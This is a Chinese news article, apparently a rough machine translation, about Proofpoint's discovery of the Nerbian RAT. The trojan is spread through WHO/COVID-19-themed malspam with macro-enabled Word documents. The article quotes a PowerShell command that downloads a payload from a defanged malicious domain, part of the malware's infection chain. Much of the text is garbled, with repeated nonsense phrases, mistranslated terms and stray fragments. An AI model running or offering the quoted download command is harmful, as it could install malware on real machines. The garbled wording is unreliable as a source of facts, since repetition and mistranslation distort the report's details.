首页 > 安全 > 正文

新的Nerbian老鼠通过MALSPAM广告系列使用Covid-19

最后更新 :2022.05.13

研究人员发现了一个新的远程访问特洛伊木马,名为Nerbian Rat,它实现了复杂的逃避和抗分析技术。

来自Procect的研究人员发现了一种新的远程访问Trojan,称为Nerbian Rat,它实现了复杂的抗分析和抗分析和分析和抗药性和抗药性和反逆转能力。

恶意软件通过MALSPAM广告系列使用Covid-19和世界卫生组织(WHO)主题传播。大鼠的名称来自恶意软件的源代码中的命名函数,Nerbia是小说Don Quixote的虚构场所。
WHO nerbian RAT

Nerbian Rat用GO编程语言编写,用于64位系统,以使恶意软件乘法型。

ProofPoint发现的MALSPAM广告系列于4月26日开始,针对多个行业。

从2022年4月26日开始,Proofpoint研究人员观察到了低卷(少于100条消息)电子邮件传播的MAlware活动发送给多个行业。威胁不成比例地影响意大利,西班牙和英国的实体。读取证明点发布的分析,这些电子邮件声称代表世界卫生组织(WHO),其中包含有关COVID-19的重要信息。有什么想法吗?#谁#covid19主题诱饵

powerShell iwr -uri https://www.fernandestechnical。] com/pub/pub/pub/pub/pub/pub/gitlog -outfile c:用户.com/babxjrm0ti

—Proxylife(@pr0xylife)2022年4月28日

这些电子邮件包含一个武器的单词附件,有时会被RAR压缩。在启用宏后,提供的文件揭示了与COVID-19的安全有关的信息,特别是有关感染个体自我隔离的措施。

该文件包含来自卫生服务主管(HSE),爱尔兰政府和国家COU的徽标

打开了文档并启用了宏,BAT文件将执行powerShell作为Goland 64位滴管ustageuav.exe。

[

[

[

[123] updateUav可执行文件是Nerbian Rat的滴管,并从各种GitHub项目中借用了代码。

Nerbian Rat支持各种不同的功能,例如记录击键和捕获屏幕的图像,并处理屏幕的图像,并处理了处理。SSL上的通信。 证明点高度信心评估滴管和老鼠都是由同一实体创建的,虽然可以修改滴管以在将来修改以交付不同的有效负载,但滴管器在静态上配置为下载并在分析时确定此特定有效载荷的持久性。结论包括妥协指标(IOC)的报告。

请投票给安全事务作为最佳欧洲网络安全博客作者奖2022投票对于您的获奖者在“弱者最佳个人(非商业)安全博客和技术WHIZ最佳技术博客以及您选择的其他人”部分中为我投票。提名,请访问: https: https://docs.google.com/forms/d/e/1faipqlsfxxrximz9qm9iipumqic-iomqic-iom-npqmosfznjxrbqryjgcow/viewform  

- END -

看更多